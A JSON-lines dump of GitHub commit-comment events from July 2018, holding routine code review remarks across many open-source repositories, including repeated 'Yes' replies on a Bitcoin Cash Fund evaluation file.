{"id":"8016904034","type":"CommitCommentEvent","actor":{"login":"KnowOne134"},"repo":{"name":"DarkstarProject/darkstar"},"payload":{"comment":{"id":29829814,"position":8,"line":8,"path":"scripts/globals/abilities/cover.lua","commit_id":"5f3f86581787b9627aff75b7f459f8896ed164f9","created_at":"2018-07-25T14:35:12Z","updated_at":"2018-07-25T14:35:12Z","author_association":"CONTRIBUTOR","body":"Can remove settings. Noting is being changed with it"}},"created_at":"2018-07-25T14:35:12Z"}
{"id":"8016905211","type":"CommitCommentEvent","actor":{"login":"Mouvedia"},"repo":{"name":"reactos/reactos"},"payload":{"comment":{"id":29829816,"position":1349,"line":699,"path":"reactos/win32ss/user/user32/user32.spec","commit_id":"8ce92839868c57923e9266a5c169d1254ab4d91d","created_at":"2018-07-25T14:35:21Z","updated_at":"2018-07-25T14:35:21Z","author_association":"NONE","body":"UnlockWindowUpdate is missing."}},"created_at":"2018-07-25T14:35:21Z"}
{"id":"8016906271","type":"CommitCommentEvent","actor":{"login":"richardchien"},"repo":{"name":"richardchien/coolq-http-api"},"payload":{"comment":{"id":29829820,"position":null,"line":null,"path":null,"commit_id":"0daeaa8cfb5a4dd62917e594538705e7b5d71733","created_at":"2018-07-25T14:35:30Z","updated_at":"2018-07-25T14:35:30Z","author_association":"OWNER","body":"不是 `text`，是 `message`（（"}},"created_at":"2018-07-25T14:35:30Z"}
{"id":"8016908401","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"MediaArea/MediaInfoLib"},"payload":{"comment":{"id":29829824,"position":13,"line":1301,"path":"Source/MediaInfo/Audio/File_Ac3.cpp","commit_id":"af08cea9f9b72b320fff2ddd974a6948b466e579","created_at":"2018-07-25T14:35:48Z","updated_at":"2018-07-25T14:35:48Z","author_association":"CONTRIBUTOR","body":"Sorry for the trouble i get it wrong..."}},"created_at":"2018-07-25T14:35:48Z"}
{"id":"8016910089","type":"CommitCommentEvent","actor":{"login":"hanxiaomax"},"repo":{"name":"Daisy001007/WordPowerMadeEasy"},"payload":{"comment":{"id":29829827,"position":null,"line":null,"path":null,"commit_id":"f5e0d977eda57652defb3927c301c2b3056acba9","created_at":"2018-07-25T14:36:04Z","updated_at":"2018-07-25T14:36:04Z","author_association":"NONE","body":"可以提交pr，合并过来 ：）"}},"created_at":"2018-07-25T14:36:04Z"}
{"id":"8016914126","type":"CommitCommentEvent","actor":{"login":"XiaoLin0815"},"repo":{"name":"richardchien/coolq-http-api"},"payload":{"comment":{"id":29829835,"position":null,"line":null,"path":null,"commit_id":"0daeaa8cfb5a4dd62917e594538705e7b5d71733","created_at":"2018-07-25T14:36:40Z","updated_at":"2018-07-25T14:36:40Z","author_association":"NONE","body":"哦抱歉telegram api写习惯了 ((("}},"created_at":"2018-07-25T14:36:40Z"}
{"id":"8016915487","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29829837,"position":null,"line":null,"path":null,"commit_id":"6a83ab59a740f7692c27e0d6e05dcad6da62a751","created_at":"2018-07-25T14:36:53Z","updated_at":"2018-07-25T14:36:53Z","author_association":"OWNER","body":"I don't think that works, because `(P.MO P.Mul)` is actually a space (and we want to keep it that way). You'll need to have an alternate `P.MO` which prints as an explicit multiplication sign.  Also, you only deal with cases of 2 arguments (your pattern match in lines 95 and 97 match lists of length 2, which is probably not what you want). Right now, lines 91--94 and 95--98 do exactly the same thing."}},"created_at":"2018-07-25T14:36:53Z"}
{"id":"8016915950","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29829839,"position":22,"line":76,"path":"src/processing/processing.c","commit_id":"9b3d31613ced492a79d3ca8faf130c825077acbf","created_at":"2018-07-25T14:36:57Z","updated_at":"2018-07-25T14:36:57Z","author_association":"COLLABORATOR","body":"Indirectly from the LUT. It has 4096 values, and an input range up to 5.766... (lower limit I ignore... @ -0.007, makes the calculation more complex and slower and I did not see a difference).\r\nFor applying correctly we need the exposure at +-0, and this is at value 1.2, to correct this we have to divide by pow(2.0, 1.2) (found this in Ilias code somewhere).  "}},"created_at":"2018-07-25T14:36:57Z"}
{"id":"8016920813","type":"CommitCommentEvent","actor":{"login":"YusraMohamed"},"repo":{"name":"YusraMohamed/Supply-Commidity"},"payload":{"comment":{"id":29829852,"position":null,"line":null,"path":null,"commit_id":"403f87074f975826f40df9a1c19f458f63f51916","created_at":"2018-07-25T14:37:39Z","updated_at":"2018-07-25T14:37:39Z","author_association":"OWNER","body":"am noam\r\n"}},"created_at":"2018-07-25T14:37:39Z"}
{"id":"8016922050","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29829854,"position":21,"line":21,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:37:51Z","updated_at":"2018-07-25T14:37:51Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-25T14:37:51Z"}
{"id":"8016923166","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29829861,"position":22,"line":22,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:38:01Z","updated_at":"2018-07-25T14:38:01Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-25T14:38:01Z"}
{"id":"8016923401","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29829862,"position":20,"line":20,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:38:04Z","updated_at":"2018-07-25T14:38:04Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-25T14:38:04Z"}
{"id":"8016924018","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29829863,"position":19,"line":19,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:38:10Z","updated_at":"2018-07-25T14:38:10Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-25T14:38:10Z"}
{"id":"8016924541","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29829865,"position":18,"line":18,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:38:14Z","updated_at":"2018-07-25T14:38:14Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-25T14:38:14Z"}
{"id":"8016924804","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29829867,"position":17,"line":17,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:38:16Z","updated_at":"2018-07-25T14:38:16Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-25T14:38:16Z"}
{"id":"8016925081","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29829870,"position":16,"line":16,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:38:19Z","updated_at":"2018-07-25T14:38:19Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-25T14:38:19Z"}
{"id":"8016925188","type":"CommitCommentEvent","actor":{"login":"Ericson2314"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29829871,"position":null,"line":null,"path":null,"commit_id":"310cb761359b16ad2ec72662a0b703dbb816a379","created_at":"2018-07-25T14:38:20Z","updated_at":"2018-07-25T14:38:20Z","author_association":"MEMBER","body":"Short answer is it's WIP and not usee by default until I sort those things out. This is probably no harder to maintain than the mess we have already!\r\n\r\nhttps://github.com/richfelker/musl-cross-make does do this this way, as does exherbo https://git.exherbo.org/summer/packages/sys-libs/libgcc/index.html"}},"created_at":"2018-07-25T14:38:20Z"}
{"id":"8016925331","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29829872,"position":15,"line":15,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:38:21Z","updated_at":"2018-07-25T14:38:21Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-25T14:38:21Z"}
{"id":"8016925497","type":"CommitCommentEvent","actor":{"login":"Danialjim"},"repo":{"name":"JamesMelgar/Tarea2_Ayd2"},"payload":{"comment":{"id":29829873,"position":null,"line":null,"path":null,"commit_id":"78169c741c65910da47a18936129a6f03985394c","created_at":"2018-07-25T14:38:23Z","updated_at":"2018-07-25T14:38:23Z","author_association":"COLLABORATOR","body":"Componente Seguridad"}},"created_at":"2018-07-25T14:38:23Z"}
{"id":"8016925625","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29829874,"position":14,"line":14,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:38:24Z","updated_at":"2018-07-25T14:38:24Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-25T14:38:24Z"}
{"id":"8016925980","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29829875,"position":13,"line":13,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:38:27Z","updated_at":"2018-07-25T14:38:27Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-25T14:38:27Z"}
{"id":"8016926027","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29829876,"position":12,"line":12,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:38:27Z","updated_at":"2018-07-25T14:38:27Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-25T14:38:27Z"}
{"id":"8016928937","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"google/honggfuzz"},"payload":{"comment":{"id":29829882,"position":null,"line":null,"path":null,"commit_id":"64e3a05714155bc19fdbd2a78be94a881fa35029","created_at":"2018-07-25T14:38:54Z","updated_at":"2018-07-25T14:38:54Z","author_association":"NONE","body":"I propose to log errno in error branches."}},"created_at":"2018-07-25T14:38:54Z"}
{"id":"8016934217","type":"CommitCommentEvent","actor":{"login":"jacksonsky"},"repo":{"name":"koolshare/koolshare.github.io"},"payload":{"comment":{"id":29829900,"position":null,"line":null,"path":null,"commit_id":"000959ce1770191a98598f2cc21c6278fccf05a7","created_at":"2018-07-25T14:39:43Z","updated_at":"2018-07-25T14:39:43Z","author_association":"NONE","body":"2.6.8 为什么装不了"}},"created_at":"2018-07-25T14:39:43Z"}
{"id":"8016935531","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29829902,"position":null,"line":null,"path":null,"commit_id":"c206bb373471b6e725cc080b8818b66dc7fac5c8","created_at":"2018-07-25T14:39:55Z","updated_at":"2018-07-25T14:39:55Z","author_association":"OWNER","body":"Although this works, it is not really what we want. The reason it works is that our examples are **hacked** to use `Pow` to display scientific notation. We should remove those hacks.\r\n\r\nThen the 'correct' way to do this would be to interpret `Dbl` so that constants which are big/small display in scientific notation. The threshold to use for that could then be a configuration option (which can be passed through via the sm argument)."}},"created_at":"2018-07-25T14:39:55Z"}
{"id":"8016942094","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29829922,"position":26,"line":26,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:40:54Z","updated_at":"2018-07-25T14:40:54Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-25T14:40:54Z"}
{"id":"8016942802","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29829925,"position":24,"line":24,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:41:00Z","updated_at":"2018-07-25T14:41:00Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-25T14:41:00Z"}
{"id":"8016951994","type":"CommitCommentEvent","actor":{"login":"rectifyer"},"repo":{"name":"merit-gem/merit"},"payload":{"comment":{"id":29829938,"position":5,"line":6,"path":"lib/merit/models/active_record/merit/activity_log.rb","commit_id":"27c4a5cba67c7ecce98b7338b253c563e4105d32","created_at":"2018-07-25T14:42:20Z","updated_at":"2018-07-25T14:42:20Z","author_association":"NONE","body":"FYI, this seems to break Rails 4 since `optional` isn't a valid key there. Once I downloaded to Merit 3.0.1 it worked again."}},"created_at":"2018-07-25T14:42:20Z"}
{"id":"8016952291","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29829939,"position":28,"line":28,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:42:23Z","updated_at":"2018-07-25T14:42:23Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-25T14:42:23Z"}
{"id":"8016954356","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29829944,"position":33,"line":33,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:42:41Z","updated_at":"2018-07-25T14:42:41Z","author_association":"CONTRIBUTOR","body":"Yes\r\n"}},"created_at":"2018-07-25T14:42:41Z"}
{"id":"8016954833","type":"CommitCommentEvent","actor":{"login":"jgrandja"},"repo":{"name":"jzheaux/spring-security"},"payload":{"comment":{"id":29829945,"position":86,"line":234,"path":"config/src/main/java/org/springframework/security/config/annotation/web/configurers/oauth2/server/resource/OAuth2ResourceServerConfigurer.java","commit_id":"95e2877ad54cacbf40ae9501a36048d7a3cbc24a","created_at":"2018-07-25T14:42:45Z","updated_at":"2018-07-25T14:42:45Z","author_association":"COLLABORATOR","body":"The second approach you list is the common pattern we've been using so I'm thinking we stick with that approach. However, I also like the concatenation approach as well. Not sure which one to go with at the moment."}},"created_at":"2018-07-25T14:42:45Z"}
{"id":"8016955607","type":"CommitCommentEvent","actor":{"login":"giovannimatta"},"repo":{"name":"giovannimatta/Test"},"payload":{"comment":{"id":29829955,"position":null,"line":null,"path":null,"commit_id":"c7d71e8abd5d739ccfa010ddceb67fb39840eb8c","created_at":"2018-07-25T14:42:52Z","updated_at":"2018-07-25T14:42:52Z","author_association":"OWNER","body":"coment on commit"}},"created_at":"2018-07-25T14:42:52Z"}
{"id":"8016958114","type":"CommitCommentEvent","actor":{"login":"LaCuneta"},"repo":{"name":"diparthshah/Galapagos"},"payload":{"comment":{"id":29829960,"position":4,"line":54,"path":"app/assets/javascripts/beak/widgets/ractives/code-editor.coffee","commit_id":"6e4febeb827ad9cc4aa5e50fb5b9ebc4cfc309ec","created_at":"2018-07-25T14:43:13Z","updated_at":"2018-07-25T14:43:13Z","author_association":"NONE","body":"I'd prefer to see this method just be the actual helper function `(cm, options) -> # code to get list`, and then move the `CodeMirror.registerHelper()` call to the `'complete'` event.  Also, it should be `netLogoHintHelper`, with the capital `L`.  "}},"created_at":"2018-07-25T14:43:13Z"}
{"id":"8016958612","type":"CommitCommentEvent","actor":{"login":"laagesen"},"repo":{"name":"Carpe2016/moose"},"payload":{"comment":{"id":29829963,"position":4,"line":46,"path":"modules/phase_field/src/kernels/ACInterface.C","commit_id":"1a911099dc0bce8b04d67de31e5b0376f1c7c51e","created_at":"2018-07-25T14:43:16Z","updated_at":"2018-07-25T14:43:16Z","author_association":"NONE","body":"No need to modify ACInterface, please restore this comment"}},"created_at":"2018-07-25T14:43:16Z"}
{"id":"8016960538","type":"CommitCommentEvent","actor":{"login":"zilav"},"repo":{"name":"TES5Edit/TES5Edit"},"payload":{"comment":{"id":29829966,"position":4,"line":696,"path":"wbInit.pas","commit_id":"b74ce19408f0997c4b4a761c30b69acb3cd0f65a","created_at":"2018-07-25T14:43:32Z","updated_at":"2018-07-25T14:43:32Z","author_association":"CONTRIBUTOR","body":"Why? I know that -30000 causes Havok issues in FO3 and FNV (the reason why I made custom UDR settings), but Skyrim and Fallout 4 are fine afaik."}},"created_at":"2018-07-25T14:43:32Z"}
{"id":"8016960971","type":"CommitCommentEvent","actor":{"login":"krisb78"},"repo":{"name":"TH3RMIT3/validation-code"},"payload":{"comment":{"id":29829969,"position":47,"line":35,"path":"validate.py","commit_id":"6f6265cfae83360938b0ab693119c1fe93770a8b","created_at":"2018-07-25T14:43:37Z","updated_at":"2018-07-25T14:43:37Z","author_association":"NONE","body":"What's \"num\" for?"}},"created_at":"2018-07-25T14:43:37Z"}
{"id":"8016961829","type":"CommitCommentEvent","actor":{"login":"Sergey2454"},"repo":{"name":"aws/aws-sdk-net"},"payload":{"comment":{"id":29829971,"position":null,"line":null,"path":null,"commit_id":"e31331d3d5bb64966e4255ad422e5a06d80c84c0","created_at":"2018-07-25T14:43:44Z","updated_at":"2018-07-25T14:43:44Z","author_association":"NONE","body":"e31331d"}},"created_at":"2018-07-25T14:43:44Z"}
{"id":"8016963638","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29829974,"position":34,"line":34,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:44:01Z","updated_at":"2018-07-25T14:44:01Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-25T14:44:01Z"}
{"id":"8016964532","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29829976,"position":35,"line":35,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:44:09Z","updated_at":"2018-07-25T14:44:09Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-25T14:44:09Z"}
{"id":"8016965000","type":"CommitCommentEvent","actor":{"login":"krisb78"},"repo":{"name":"TH3RMIT3/validation-code"},"payload":{"comment":{"id":29829978,"position":20,"line":13,"path":"validate.py","commit_id":"6f6265cfae83360938b0ab693119c1fe93770a8b","created_at":"2018-07-25T14:44:13Z","updated_at":"2018-07-25T14:44:13Z","author_association":"NONE","body":"Having a function just to print a line out seems an overkill to me"}},"created_at":"2018-07-25T14:44:13Z"}
{"id":"8016965293","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29829980,"position":36,"line":36,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:44:15Z","updated_at":"2018-07-25T14:44:15Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-25T14:44:15Z"}
{"id":"8016966278","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29829986,"position":37,"line":37,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:44:23Z","updated_at":"2018-07-25T14:44:23Z","author_association":"CONTRIBUTOR","body":"Yes"}},"created_at":"2018-07-25T14:44:23Z"}
{"id":"8016970424","type":"CommitCommentEvent","actor":{"login":"jgrandja"},"repo":{"name":"jzheaux/spring-security"},"payload":{"comment":{"id":29829992,"position":27,"line":27,"path":"oauth2/oauth2-core/src/main/java/org/springframework/security/oauth2/core/validator/DelegatingOAuth2TokenValidator.java","commit_id":"95e2877ad54cacbf40ae9501a36048d7a3cbc24a","created_at":"2018-07-25T14:44:55Z","updated_at":"2018-07-25T14:44:55Z","author_association":"COLLABORATOR","body":"We may want to preserve the ordering of the validators with a `LinkedList`"}},"created_at":"2018-07-25T14:44:55Z"}
{"id":"8016972928","type":"CommitCommentEvent","actor":{"login":"LaCuneta"},"repo":{"name":"diparthshah/Galapagos"},"payload":{"comment":{"id":29829998,"position":17,"line":67,"path":"app/assets/javascripts/beak/widgets/ractives/code-editor.coffee","commit_id":"6e4febeb827ad9cc4aa5e50fb5b9ebc4cfc309ec","created_at":"2018-07-25T14:45:16Z","updated_at":"2018-07-25T14:45:16Z","author_association":"NONE","body":"I know this was copied from the default function, but we can improve this a bit by doing something like `found = options.words.filter( (word) -> # code to check the word )`.  Also we should use `is` and not `==` in CoffeeScript. "}},"created_at":"2018-07-25T14:45:16Z"}
{"id":"8016976400","type":"CommitCommentEvent","actor":{"login":"LaCuneta"},"repo":{"name":"diparthshah/Galapagos"},"payload":{"comment":{"id":29830005,"position":22,"line":72,"path":"app/assets/javascripts/beak/widgets/ractives/code-editor.coffee","commit_id":"6e4febeb827ad9cc4aa5e50fb5b9ebc4cfc309ec","created_at":"2018-07-25T14:45:47Z","updated_at":"2018-07-25T14:45:47Z","author_association":"NONE","body":"I'd prefer this to be `if found.length > 0`; seems clearer to me."}},"created_at":"2018-07-25T14:45:47Z"}
{"id":"8016976946","type":"CommitCommentEvent","actor":{"login":"ayanamist"},"repo":{"name":"shadowsocks/shadowsocks-go"},"payload":{"comment":{"id":29830012,"position":4,"line":8,"path":".travis.yml","commit_id":"2c9262b10454bf502978f51e234a3b32761f17b2","created_at":"2018-07-25T14:45:51Z","updated_at":"2018-07-25T14:45:51Z","author_association":"CONTRIBUTOR","body":"I see this commit only exist in develop branch, but not in master branch, for nearly one year, is there any consideration not moving it to master?"}},"created_at":"2018-07-25T14:45:51Z"}
{"id":"8016978386","type":"CommitCommentEvent","actor":{"login":"jgrandja"},"repo":{"name":"jzheaux/spring-security"},"payload":{"comment":{"id":29830017,"position":36,"line":36,"path":"oauth2/oauth2-core/src/main/java/org/springframework/security/oauth2/core/validator/DelegatingOAuth2TokenValidator.java","commit_id":"95e2877ad54cacbf40ae9501a36048d7a3cbc24a","created_at":"2018-07-25T14:46:04Z","updated_at":"2018-07-25T14:46:04Z","author_association":"COLLABORATOR","body":"Always good practice to do a defensive copy"}},"created_at":"2018-07-25T14:46:04Z"}
{"id":"8016979404","type":"CommitCommentEvent","actor":{"login":"ayanamist"},"repo":{"name":"shadowsocks/shadowsocks-go"},"payload":{"comment":{"id":29830022,"position":null,"line":null,"path":null,"commit_id":"2c9262b10454bf502978f51e234a3b32761f17b2","created_at":"2018-07-25T14:46:13Z","updated_at":"2018-07-25T14:46:13Z","author_association":"CONTRIBUTOR","body":"I see this commit only exist in develop branch, but not in master branch, for nearly one year, is there any consideration not moving it to master?"}},"created_at":"2018-07-25T14:46:13Z"}
{"id":"8016982412","type":"CommitCommentEvent","actor":{"login":"Sergey2454"},"repo":{"name":"aws/aws-sdk-net"},"payload":{"comment":{"id":29830030,"position":21,"line":30,"path":"sdk/xamarin-components/DynamoDBv2/component.yaml","commit_id":"e31331d3d5bb64966e4255ad422e5a06d80c84c0","created_at":"2018-07-25T14:46:39Z","updated_at":"2018-07-25T14:46:39Z","author_association":"NONE","body":"28"}},"created_at":"2018-07-25T14:46:39Z"}
{"id":"8016982958","type":"CommitCommentEvent","actor":{"login":"krisb78"},"repo":{"name":"TH3RMIT3/validation-code"},"payload":{"comment":{"id":29830032,"position":59,"line":47,"path":"validate.py","commit_id":"6f6265cfae83360938b0ab693119c1fe93770a8b","created_at":"2018-07-25T14:46:43Z","updated_at":"2018-07-25T14:46:43Z","author_association":"NONE","body":"Each of these three forloops looks exactly the same, can you not avoid code repetition?"}},"created_at":"2018-07-25T14:46:43Z"}
{"id":"8016985452","type":"CommitCommentEvent","actor":{"login":"Sergey2454"},"repo":{"name":"aws/aws-sdk-net"},"payload":{"comment":{"id":29830037,"position":21,"line":30,"path":"sdk/xamarin-components/DynamoDBv2/component.yaml","commit_id":"e31331d3d5bb64966e4255ad422e5a06d80c84c0","created_at":"2018-07-25T14:47:06Z","updated_at":"2018-07-25T14:47:06Z","author_association":"NONE","body":"30"}},"created_at":"2018-07-25T14:47:06Z"}
{"id":"8016987311","type":"CommitCommentEvent","actor":{"login":"krisb78"},"repo":{"name":"TH3RMIT3/validation-code"},"payload":{"comment":{"id":29830040,"position":78,"line":62,"path":"validate.py","commit_id":"6f6265cfae83360938b0ab693119c1fe93770a8b","created_at":"2018-07-25T14:47:21Z","updated_at":"2018-07-25T14:47:21Z","author_association":"NONE","body":"This looks very ugly, please format it nicely"}},"created_at":"2018-07-25T14:47:21Z"}
{"id":"8016988191","type":"CommitCommentEvent","actor":{"login":"Z9629"},"repo":{"name":"Z9629/mytestgit"},"payload":{"comment":{"id":29830041,"position":null,"line":null,"path":null,"commit_id":"a7c2275fc1d8b773159f8015caa6a8b1fdc50970","created_at":"2018-07-25T14:47:29Z","updated_at":"2018-07-25T14:47:29Z","author_association":"OWNER","body":"web+django"}},"created_at":"2018-07-25T14:47:29Z"}
{"id":"8016988418","type":"CommitCommentEvent","actor":{"login":"dwieeb"},"repo":{"name":"ionic-team/cordova-plugin-ionic-webview"},"payload":{"comment":{"id":29830042,"position":88,"line":93,"path":"README.md","commit_id":"5c8ad8e66b8ccb5c3dc415ad193409dba82d1690","created_at":"2018-07-25T14:47:31Z","updated_at":"2018-07-25T14:47:31Z","author_association":"CONTRIBUTOR","body":"I'm not convinced they were necessary in version 1 because they were added here:\r\n\r\n(this is 1.x code)\r\nhttps://github.com/ionic-team/cordova-plugin-ionic-webview/blob/1.x/plugin.xml#L40-L47"}},"created_at":"2018-07-25T14:47:31Z"}
{"id":"8016992065","type":"CommitCommentEvent","actor":{"login":"Stephany77777"},"repo":{"name":"The-Bitcoin-Cash-Fund/FPR"},"payload":{"comment":{"id":29830050,"position":40,"line":40,"path":"FPR-0086/EVAL-0086.md","commit_id":"b410c5e3d9d5d9b2e6231eb48b7f0477afa004b2","created_at":"2018-07-25T14:48:05Z","updated_at":"2018-07-25T14:48:05Z","author_association":"CONTRIBUTOR","body":"50.6 Bitcoin Cash to meet the objectives set at the beginning of this project, subsequently with the emergence of new objectives in accordance with the needs of the population for the use of Bitcoin Cash will be establishing new costs\r\n"}},"created_at":"2018-07-25T14:48:05Z"}
{"id":"8016992534","type":"CommitCommentEvent","actor":{"login":"krisb78"},"repo":{"name":"TH3RMIT3/validation-code"},"payload":{"comment":{"id":29830052,"position":40,"line":28,"path":"validate.py","commit_id":"6f6265cfae83360938b0ab693119c1fe93770a8b","created_at":"2018-07-25T14:48:09Z","updated_at":"2018-07-25T14:48:09Z","author_association":"NONE","body":"You would be better off using a list for this, so that the ordering can be preserved."}},"created_at":"2018-07-25T14:48:09Z"}
{"id":"8016995087","type":"CommitCommentEvent","actor":{"login":"laagesen"},"repo":{"name":"Carpe2016/moose"},"payload":{"comment":{"id":29830058,"position":10,"line":10,"path":"modules/phase_field/include/materials/InterfaceAnisotropyMaterial.h","commit_id":"1a911099dc0bce8b04d67de31e5b0376f1c7c51e","created_at":"2018-07-25T14:48:31Z","updated_at":"2018-07-25T14:48:31Z","author_association":"NONE","body":"We already have a material called `InterfaceOrientationMaterial` which considers a single order parameter only. This material considers more than one order parameter when calculating the orientation. To make it clear from the filename how this new material differs from the old one, please change the name to `InterfaceOrientationMultiphaseMaterial`."}},"created_at":"2018-07-25T14:48:31Z"}
{"id":"8016995173","type":"CommitCommentEvent","actor":{"login":"krisb78"},"repo":{"name":"TH3RMIT3/validation-code"},"payload":{"comment":{"id":29830060,"position":78,"line":62,"path":"validate.py","commit_id":"6f6265cfae83360938b0ab693119c1fe93770a8b","created_at":"2018-07-25T14:48:32Z","updated_at":"2018-07-25T14:48:32Z","author_association":"NONE","body":"I don't see you returning a non-zero code if there is an error..."}},"created_at":"2018-07-25T14:48:32Z"}
